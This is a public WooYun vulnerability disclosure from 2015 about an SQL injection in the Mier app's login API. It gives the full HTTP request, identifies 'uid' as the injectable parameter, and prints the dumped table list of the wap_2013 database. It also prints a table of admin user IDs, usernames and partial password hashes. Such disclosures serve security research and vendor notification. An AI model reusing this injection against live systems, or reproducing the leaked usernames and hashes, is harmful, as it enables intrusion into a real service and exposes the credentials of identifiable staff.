当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123358

漏洞标题:米尔app某处注射

相关厂商:米尔网

漏洞作者: 杀手

提交时间:2015-07-03 08:07

修复时间:2015-08-17 08:08

公开时间:2015-08-17 08:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入

详细说明:

2.png

这是主站,下载app后测试。。 登陆接口,抓包! 

POST /api/2.0.3/logreg_json.php?plat=android&proct=mierapp&apiCode=1&versioncode=20150617 HTTP/1.1 Content-Length: 56 Content-Type: application/x-www-form-urlencoded Host: bbs.mier123.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Encoding: gzip act=login&uid=yxtest&pwd=yxtest123&versioncode=20150617

参数uid可注射!

3.png

跑一下!

4.png


Database: wap_2013
[110 tables]
+---------------------+
| duoshuo_commentmeta |
| m_addonarticle      |
| m_addonimages       |
| m_addoninfos        |
| m_addonshop         |
| m_addonsoft         |
| m_addonspec         |
| m_admin             |
| m_admintype         |
| m_advancedsearch    |
| m_app_action_log    |
| m_app_action_mi_log |
| m_app_ad            |
| m_app_channel       |
| m_app_datalog       |
| m_app_down          |
| m_app_exchange      |
| m_app_help          |
| m_app_image         |
| m_app_member        |
| m_app_member_addons |
| m_app_member_banned |
| m_app_reward        |
| m_app_share         |
| m_app_tuijian       |
| m_app_user_relation |
| m_arcatt            |
| m_arccache          |
| m_archives          |
| m_arcmulti          |
| m_arcrank           |
| m_arctiny           |
| m_arctype           |
| m_area              |
| m_channeltype       |
| m_co_htmls          |
| m_co_mediaurls      |
| m_co_note           |
| m_co_onepage        |
| m_co_urls           |
| m_diyforms          |
| m_dl_log            |
| m_downloads         |
| m_erradd            |
| m_feedback          |
| m_feedback_recy     |
| m_flink             |
| m_flinktype         |
| m_freelist          |
| m_homepageset       |
| m_keywords          |
| m_log               |
| m_member            |
| m_member_company    |
| m_member_feed       |
| m_member_flink      |
| m_member_friends    |
| m_member_group      |
| m_member_guestbook  |
| m_member_model      |
| m_member_msg        |
| m_member_operation  |
| m_member_person     |
| m_member_pms        |
| m_member_snsmsg     |
| m_member_space      |
| m_member_stow       |
| m_member_stowtype   |
| m_member_tj         |
| m_member_type       |
| m_member_vhistory   |
| m_moneycard_record  |
| m_moneycard_type    |
| m_mtypes            |
| m_multiserv_config  |
| m_myad              |
| m_myadtype          |
| m_mytag             |
| m_payment           |
| m_plus              |
| m_purview           |
| m_pwd_tmp           |
| m_quick_login       |
| m_ratings           |
| m_scores            |
| m_search_cache      |
| m_search_keywords   |
| m_sgpage            |
| m_shops_delivery    |
| m_shops_orders      |
| m_shops_products    |
| m_shops_userinfo    |
| m_sign_in           |
| m_softconfig        |
| m_spec              |
| m_speclist          |
| m_sphinx            |
| m_stepselect        |
| m_sys_enum          |
| m_sys_module        |
| m_sys_set           |
| m_sys_task          |
| m_sysconfig         |
| m_tagindex          |
| m_taglist           |
| m_uploads           |
| m_verifies          |
| m_verify_code       |
| m_vote              |
| m_vote_member       |
+---------------------+


漏洞证明:

id	userid	pwd
1	jishubu	4100da4e828673e8cab4
4	app	18c22a3851ec9b6f5747
7	huangchengcheng	61277dab08e4f0205797
8	yangsai	0fd7be54fcadf9da2a4f
9	xuchun	09c8864fff4f328e09bc
10	lixin	dd90a9e2287b2c011edb
11	wangshun	6a60ccd5e11978bae948
281	junshijia	f6852cca0d2f70c789c1
316	penghaoming	0e6f1b3e8a60e80a7867
340	changbaichao	b804c30ef693546ca463

修复方案:

版权声明:转载请注明来源 杀手@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝